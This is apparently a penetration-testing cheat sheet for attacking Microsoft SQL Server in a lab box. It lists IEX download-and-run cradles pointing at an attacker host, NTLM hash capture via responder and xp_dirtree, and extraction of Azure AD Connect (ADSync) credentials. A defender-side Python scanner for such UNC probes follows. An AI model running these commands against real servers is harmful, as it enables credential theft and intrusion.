MSSQL

Do you have valid creds?

mssqlclient.py manager/operator:operator@manager.htb -windows-auth

# mssqlclient.py <domain>/<user>:<pass>@<target FQDN> -windows-auth

Enumeration for PrivEsc

Do you have access to the machine with mssql?

sqlcmd -Q "select * from sys.databases"
sqlcmd -Q "select name,create_date from sys.databases"

Using PowerUpSQL

# download and import
PS> IEX(New-Object Net.WebClient).downloadString("http://<attacker ip>:<port>/PowerUpSQL.ps1")


Invoke-SQLAudit -Verbose

Capturing the NTLM Hash

Make sure you can execute xp_dirtree through sqlcmd.

# setup responder
sudo responder -I tun0

# call the attacker IP inside the sqlcmd

sqlcmd -Q "xp_dirtree '\\<attacker ip>\test'"
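As an added defender-side example (not part of the original notes): a small Python scanner that flags the xp_dirtree / xp_fileexist / xp_subdirs calls described above when they point at a UNC host outside an allowlist. Input is constructed sample T-SQL statements of the kind you would pull from a SQL Server audit or Extended Events capture; the allowlist host is an assumption.

```python
import re

# Constructed sample statements (not real logs), as a SQL Server audit or
# Extended Events capture would record them.
SAMPLE_STATEMENTS = [
    "select name,create_date from sys.databases",
    "EXEC xp_dirtree '\\\\10.10.14.5\\test'",
    "exec master..xp_fileexist '\\\\fileserver.corp.local\\share\\x'",
    "EXEC xp_dirtree 'C:\\inetpub\\wwwroot'",
    "exec xp_subdirs '\\\\192.168.1.200\\loot', 1, 1",
]

# Extended stored procedures that make SQL Server open a path; given a UNC
# path, the SQL Server service account authenticates to the remote host.
UNC_PROCS = ("xp_dirtree", "xp_fileexist", "xp_subdirs")

# Matches the host part of a quoted UNC path: '\\host\share...'
UNC_PATH = re.compile(r"'\\\\([^\\']+)\\")


def flag_unc_probe(statement, allowed_hosts=frozenset()):
    """Return the remote host if `statement` calls one of UNC_PROCS with a
    UNC path to a host outside `allowed_hosts`, otherwise None."""
    lowered = statement.lower()
    if not any(proc in lowered for proc in UNC_PROCS):
        return None
    match = UNC_PATH.search(statement)
    if match is None:
        return None  # local path such as C:\inetpub: no outbound auth
    host = match.group(1).lower()
    return None if host in allowed_hosts else host


def scan(statements, allowed_hosts=frozenset()):
    """Return (statement, host) pairs worth alerting on."""
    hits = []
    for statement in statements:
        host = flag_unc_probe(statement, allowed_hosts)
        if host is not None:
            hits.append((statement, host))
    return hits


if __name__ == "__main__":
    # "fileserver.corp.local" is an assumed, known-good file server.
    for statement, host in scan(SAMPLE_STATEMENTS, {"fileserver.corp.local"}):
        print(f"outbound SMB auth to {host}: {statement}")
```

Pair the scan with a check that EXECUTE on these procedures is not granted to public, and that the instance's service account is a low-privilege or managed service account.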

Is there Azure AD and DCSync?

ref: https://blog.xpnsec.com/azuread-connect-for-redteam/

sqlcmd -Q "Use ADSync; select private_configuration_xml,encrypted_configuration FROM mms_management_agent"


# download the decryption script from the reference above as decrypt.ps1 and make sure you change the Data Source.
IEX(New-Object Net.WebClient).downloadString('http://<attacker ip>:<port>/decrypt.ps1')
